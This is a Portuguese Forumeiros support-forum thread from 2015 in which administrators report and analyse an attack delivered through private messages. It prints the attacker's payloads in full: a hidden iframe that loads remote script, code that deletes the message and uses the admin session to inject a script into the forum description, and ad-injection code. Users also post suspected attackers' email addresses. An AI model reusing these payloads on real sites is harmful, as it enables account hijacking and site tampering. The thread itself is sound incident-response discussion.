Fórum dos Fóruns

Fórum dos Fóruns Forumeiros

Welcome FdF Bem-vindo ao fórum de suporte Forumeiros  Muito feliz


Para aproveitar tudo o que o nosso fórum lhe oferece, agradecemos que se identifique, se já é nosso membro, ou que se junte à nossa comunidade, fazendo o seu registo.
Acesso rápido

Fóruns de suporte oficiais


Pesquisa de Satisfação
Queremos saber a sua opinião sobre os nossos serviços. Clique nesta vinheta e preencha este inquérito.

Login

Esqueci minha senha

Últimos assuntos
» Assinatura em baixo do perfil
Hoje à(s) 15:56 por DD15Ӽ

» Desativar sistema de enquete (pergunta / votação)
Hoje à(s) 14:36 por Kyo Panda

» Quem você mais admira no Fórum dos Fóruns?
Hoje à(s) 14:27 por David Sousa

» Personalizar SCeditor
Hoje à(s) 13:35 por Vinicius Reis

» Personalizar Menu
Hoje à(s) 13:33 por YouTube3

» Perfil nos Topico
Hoje à(s) 10:36 por Kyo Panda

» Redimensionamento de imagem
Hoje à(s) 10:18 por Kyo Panda

Perdi minha senha!
Obter senha

Nota: use se tiver perdido acesso ao seu painel de controle.

Magazine 2016
Participe da pesquisa de satisfação 2016 e dê sua opinião sobre os diversos serviços de Forumeiros.
Parceiros Forumeiros
Quem está conectado
185 usuários online :: 6 usuários cadastrados, Nenhum Invisível e 179 Visitantes :: 1 Motor de busca

DD15Ӽ, giancamposm, Luiz~, Maori, Troubleshoot, xBreninho_.

[ Ver toda a lista ]


O recorde de usuários online foi de 3131 em Qui 24 Dez 2009 - 15:05

Tentativas de Hacker o Fórum, por MP.

Ver o tópico anterior Ver o tópico seguinte Ir em baixo

Resolvido Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qua 4 Fev 2015 - 15:58

Detalhes da dúvida

Versão do fórum : phpBB3
Nível de acesso : Administrador
Navegador usado : Google Chrome
Membros afetados : Vários usuários, uns sim e outros não
Problema começou : Desde o dia 27/01/2015
Endereço do fórum : http://xmutantesrpg.forumeiros.com/

Descrição do problema

Boa tarde,

Estou tendo problemas em um dos fóruns que sou administrador.

Alguém conseguiu encontrar uma brecha na segurança do forumeiros atraves de MP.

Funcionou da seguinte forma:

1- Ele mandou uma MP com uma pergunta boba, para cada um dos Adm do fórum que atuo.

2- Quando cada um dos Adm abriu a MP, dava tempo para ler ela e simplesmente ela sumia em seguida como se nunca tivesse sido mandada.

3- Achamos estranho no primeiro dia, até em então não tomamos nenhuma providencia achando que era apenas algum erro qualquer.

4 - No dia seguinte todos Adm receberam novamente a MP, comecei a desconfiar do ocorrido e fui verificar a seção de segurança do fórum para ver se tinha alguma modificação ou algo estranho. Para minha surpresa tinha mais de uma criação de javascript minha e de outros Adms, olhei as datas e horas, e bateu com o horário que abrimos as mps.

5 - Apaguei cada um dos javas scripts, mais antes cheguei a guardar para poder analisar eles depois ou pedir que alguém olha-se para mim.

6 - Entramos na conta de quem fez as mps, mas não existia mais nenhuma lá, queria recuperar o codigo da mp que nos  "hackeou" mas sem sucesso...

7 - Outro dia recebemos uma mp estranha novamente e um dos adm conseguiu pegar o codigo da MP, que estava oculto mais uma vez em uma pergunta boba.

-----------------------

IMAGENS

http://i.imgur.com/tmLjpWj.png
http://i.imgur.com/cJGlkXP.png
http://i.imgur.com/3wWvEE0.png
http://i.imgur.com/zCGFcCj.png

-----------------------

CODIGO DA TERCEIRA TENTATIVA POR MP

Código:
 [table style="width:1px;height:1px;border:1px solid transparent"][tr][td]<iframe style="width:1px;height:1px;border:1px solid transparent" src="javascript:if(window.top.dfgdgfdgfgcg===undefined){window.top.jQuery.getScript('http://xmlfeed2.6te.net/d')};window.top.dfgdgfdgfgcg='a'"></iframe>[/td]
[/tr]
[/table]

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 16:21

Estes são os códigos usados:

1-
Código:

jQuery(document).ready(function() {

    jQuery.post('/privmsg', {
        'delete': 'true',
        'mark[]': location.href.split('p=')[1],
        'confirm': 's'
    });

    var phpbb3 = '#wrap #page-header .headerbar #logo-desc p';
    var phpbb2 = 'table.bodylinewidth td.bodyline table[width="100%"][cellspacing="0"][cellpadding="0"][border="0"] td[align="center"][width="100%"] span.gen';
    var invision = '#ipbwrapper #logostrip p#site-desc';
    var punbb = '.pun #pun-intro p#pun-desc';

    if (jQuery(phpbb3).length) {
        var sitedesc = jQuery(phpbb3).html()
    } else if (jQuery(phpbb2).length) {
        var sitedesc = jQuery(phpbb2).html().split('<br>&nbsp; ')[0]
    } else if (jQuery(invision).length) {
        var sitedesc = jQuery(invision).html()
    } else if (jQuery(punbb).length) {
        var sitedesc = jQuery(punbb).html()
    } else {
        var sitedesc = ''
    };

    var codigo = '<script src=//xmlfeed2.6te.net/s></script>';
    if (sitedesc.indexOf('<script src="//xmlfeed2.6te.net/s"></script>') == -1) {
        if (sitedesc.length > 213) {
            var descricao = sitedesc.substring(0, 213) + codigo
        } else if (sitedesc.length < 150) {
            for (var wordtest = ''; wordtest.length < 150 - sitedesc.length; wordtest += ' ') {};
            var descricao = sitedesc + wordtest + codigo
        } else {
            var descricao = sitedesc + codigo
        };

        jQuery.post('/admin/index.forum?mode=general&part=general&sub=general&tid=' + jQuery('#logout').attr('href').split("tid=")[1].split("&")[0], {
            'site_desc': descricao,
            'submit': 's'
        });
    };
});

2-
Código:

if (window.dfgdfgdfgdfg === undefined) {
    window.dfgdfgdfgdfg = 'a';

    function testedeadd() {
        if (jQuery('a[href^="/admin/index.forum?part=admin&tid="]').length == 0) {
            var numaleat = parseInt(1000000) + Math.floor(Math.random() * 9999999 - 1000000);
            var h = '<div style="margin:0 auto;text-align:center"><iframe style=width:728px!important;height:90px!important;overflow:hidden!important frameborder=0 id=' + numaleat + '></iframe></div>';
            var phpbb2 = 'table.bodylinewidth td.bodyline table[cellspacing="0"][cellpadding="0"][border="0"]:has(a.mainmenu)';
            if (jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').length) {
                jQuery('script[src^="http://cas.criteo.com/delivery/ajs.php?"]').closest('div[class]').replaceWith(h)
            } else if (jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').length) {
                jQuery('script[src="http://partner.googleadservices.com/gampad/google_service.js"]').closest('div[class]').replaceWith(h)
            } else {
                if (jQuery('.pun').length) {
                    jQuery('.pun #pun-head').after(h)
                } else if (jQuery('#wrap').length) {
                    jQuery('#wrap #page-body').prepend(h)
                } else if (jQuery('#ipbwrapper').length) {
                    jQuery('#ipbwrapper #main-content').prepend(h)
                } else if (jQuery(phpbb2).length) {
                    jQuery(phpbb2).after(h)
                }
            };
            ifrm = document.getElementById(numaleat);
            ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
            ifrm.document.open();
            ifrm.document.write('<style>body{margin:0px}</style><script>google_ad_client=\x22pub-4591355146850004\x22;google_ad_slot=\x221666688237\x22;google_ad_width=728;google_ad_height=90</script><script src=http://pagead2.googlesyndication.com/pagead/show_ads.js></script>');
            ifrm.document.close();
            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }
        };
        jQuery('script[src="//xmlfeed2.6te.net/s"]').remove()
    };

    jQuery(document).ready(function() {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        }
    });

    document.addEventListener("DOMContentLoaded", function(event) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    });

    window.onload = function(e) {
        if (window.testedeaddfdgd === undefined) {
            testedeaddfdgd = 'a';
            testedeadd()
        };
    };

};
Eles estão hospedados neste domínio: http://xmlfeed2.6te.net/

Farei uma análise neles para verificar o nível de gravidade,

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qua 4 Fev 2015 - 16:32

Muito obrigado, ficarei no aguardo.

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 16:46

@danki5

Os seguintes fóruns listados abaixo e que pertencem a Forumeiros, fazem parte do código:
1- http://www.pokemonmythology.org/
2- http://routeros.forumpramim.net/

Também é "injetado" o código que está neste link: http://pagead2.googlesyndication.com/pagead/show_ads.js

Abaixo o trecho que oculta o módulo #fa_ticker_block para os respectivos fóruns acima citados:
Código:

            if (window.location.hostname == 'www.pokemonmythology.org') {
                jQuery('#fa_ticker_block').hide()
            };
            if (window.location.hostname == 'routeros.forumpramim.net') {
                jQuery('#fa_ticker_block').hide()
            }

Aguarde mais informações,

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em Qua 4 Fev 2015 - 17:38

Também recebi mp's com perguntas bem idiotas, eram duas contas de uma mesma pessoa, só apareceu um código na parte do javascrip que foi de feed, eu acabei add aquela barrinha de ferramentas que fica no topo que nem a do forumeiros.

Chrono Trigger
Nível 8

Masculino
Inscrito dia : 09/04/2010
Mensagens : 142
Pontos Ativos : 2685

http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 17:44

@Chrono Trigger

Se você for (e eu acredito que seja) um admin do fórum e poder me passar o email de quem lhe enviou essa MP, eu posso acionar a justiça do país em que o indivíduo está e com isso tomar as providências cabíveis nos tramites da lei.

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qua 4 Fev 2015 - 18:04

Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em Qua 4 Fev 2015 - 18:08

@danki5 escreveu:Etona@hotmail.com

Adp0klah@hotmail.com

No meu caso foi esses dois, mas como o fórum estava com ativação automática da conta, acredito que o email nem exista.

--

Teria alguma forma de desativar os javas que são recebidos por MP para evitar esses ataques?

Os e-mails também eram assim, era o nick do usuário.
Estrate@hotmail.com
Sonalitc@hotmail.com

O mais engraçado que quando ele mandava a mp você abria questão de segundos a página atualizava e ela era deletada, cheguei a mandar mp ao usuário, como ele tinha duas contas no fórum e é contra as regras do meu fórum, e ao me responder a mp dele também foi deletada. Depois de ler este tópico acabei banindo as duas contas, receio que não irá adiantar mas já ficarei de olho.

Chrono Trigger
Nível 8

Masculino
Inscrito dia : 09/04/2010
Mensagens : 142
Pontos Ativos : 2685

http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 18:21

A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qua 4 Fev 2015 - 18:22

http://i.imgur.com/MmfKGaJ.png
http://i.imgur.com/lHuqFGU.png

Não sei se vai ajudar, mais tenho os IPs da segunda tentativa...

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 18:28

@danki5

Sim, com o IP eu já pulo a etapa do provedor de emails, obrigado!

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por viniliff em Qua 4 Fev 2015 - 18:39

Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça. E no mais, a solução final já foi publicada:

@JScript escreveu:A todos:

Uma solução perfeita é desativar o HTML das postagens, dessa forma seu fórum não estará suscetível a esse tipo de ataque!

JS

Lembrem-se que a lei é muito mais complexa do que a simples ação de enviar MPs que "desaparecem" posteriormente. Além disso, é preciso que hajam provas concretas. Isto é apenas uma recomendação! Piscada

Até mais.

viniliff
Membro do Fórum

Masculino
Inscrito dia : 04/06/2014
Mensagens : 1710
Pontos Ativos : 3041

http://publieiros.forumeiros.com https://twitter.com/ViniliffOficial

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 4 Fev 2015 - 19:02

@viniliff escreveu:Olá.

Recomendo que não divulguem e-mails em mensagens no Fórum dos Fóruns, para fins de segurança e privacidade.

Isto é algo que não fica a meu critério, é claro, mas acredito que dialogar com o membro ou, até mesmo bani-lo, seja uma solução mais inteligente do que acionar a justiça.
É com esse pensamento que esses indivíduos ainda se mantém importunando a vida de quem tem fóruns da Forumeiros!

Então devemos dialogar com quem faz essas coisas que são consideradas ilícitas?!
Você acha mesmo que a solução "banir" funciona como deveria?

Eu acho que você deve saber que a criminalidade não está somente nas ruas físicas, mas também no mundo virtual e assim como no real, devemos combater todo e qualquer ato que prejudique a vida seja social ou virtual de alguém.

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qua 4 Fev 2015 - 19:41

viniliff

Para esclarecer, como foi informado nas mensagens acima, foram utilizadas mais de uma conta e ataques em dias consecutivos, o que invalida a solução inteligente de Banir ou de conversar, como sugerido, pois a medida que baníamos ele criava uma outra e fazia o mesmo. E como dito por Chrono, o fórum dele parece ter sofrido algo parecido, o que impede desse autor de ataques não fazer o mesmo ou já esta fazendo com outros fóruns do forumeiros por estar saindo impune?

Conheço um pouco de programação, mais sou leigo em javascript, mas pelo tamanho do código, hospedagem de scripts em outros lugares, não me parece uma tentativa de alguém que quer conversar ou que tenha preparado isso tudo para atacar apenas um fórum. Tenho a desconfiança que o alvo dele era a conta do fundador, não vejo outro motivo para ele repetir o ataque, no nosso forum conseguimos evitar que o fundador abrisse a MP, talvez evitando um problema maior.

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Chrono Trigger em Qui 5 Fev 2015 - 1:44

Eu não consegui pegar o Ip dele muito menos o código da mensagem. Bani as duas contas, caso aconteça novamente ai vamos ter que resolver de outra forma.

Chrono Trigger
Nível 8

Masculino
Inscrito dia : 09/04/2010
Mensagens : 142
Pontos Ativos : 2685

http://clothmythrevolution.com/portal.htm

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por Sennior em Sex 6 Fev 2015 - 14:19

Saudações,

JScript, o senhor com todo conhecimento que tem, será que por via não conseguiria criar algo para criar uma segurança para os membros? Algo que como eu vi em um tópico criado aqui mesmo no Fórum dos fóruns o membro pedia um código que bloqueasse JavaScript na mensagem privada.

Sou bem neutro nessa linguagem, mas o senhor com todo conhecimento acha que dá pra criar algo assim? Que sanaria a função JavaScript em mensagens privadas?
Até mais.

Sennior
Ex-Admineiro
Ex-Admineiro

Masculino
Inscrito dia : 10/06/2011
Mensagens : 16258
Pontos Ativos : 22799

http://ajuda.forumeiros.com/forum https://www.facebook.com/GlladstonHenrique

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qua 11 Fev 2015 - 10:51

@Sennior
Olá!

Aceito o desafio e lhe garanto que JS será proibido até nos tópicos, mesmo estando com o HTML ativo!!!

Em breve,

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por JScript em Qui 12 Fev 2015 - 13:43

Nota: Eu não consegui editar a mensagem anterior!


Está sendo feito um rastreamento para saber quem criou o endereço http://xmlfeed2.6te.net no host http://www.freewebhostingarea.com/ , com isso chegaremos até o indivíduo que o criou!

JS

JScript
Membro do Fórum

Masculino
Inscrito dia : 15/03/2013
Mensagens : 1449
Pontos Ativos : 3304

http://jscript.forumeiros.com/

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por danki5 em Qui 12 Fev 2015 - 16:58

Obrigado senhores pelo ótimo atendimento, ficarei no aguardo.

Bloqueie as MPs enquanto não é resolvido.

danki5
Nível 2

Masculino
Inscrito dia : 20/05/2014
Mensagens : 10
Pontos Ativos : 990

Resolvido Re: Tentativas de Hacker o Fórum, por MP.

Mensagem por nikka em Sex 13 Fev 2015 - 18:46

Olá danki5,

Devido a um iframe oculto nas mensagens ou Mensagens Privadas, um código script era adicionado à descrição do fórum, fazendo com que as publicidades aparecessem, mesmo que tenha assinalado ou pago para que isso aconteça.

Uma alteração ao nível dos códigos foi realizada hoje pelos técnicos nos fóruns Forumeiros de forma a que isso não volte a acontecer.


Agradecemos a sua colaboração e pedimos desculpas pelos inconvenientes causados.
Até mais.

nikka
Ex-Admineira
Ex-Admineira

Feminino
Inscrito dia : 17/12/2008
Mensagens : 15624
Pontos Ativos : 22852

http://ajuda.forumeiros.com/ https://www.facebook.com/forumeirospt https://twitter.com/Forumeiros_PT

Ver o tópico anterior Ver o tópico seguinte Voltar ao Topo

- Tópicos similares

Permissão deste fórum:
Você não pode responder aos tópicos neste fórum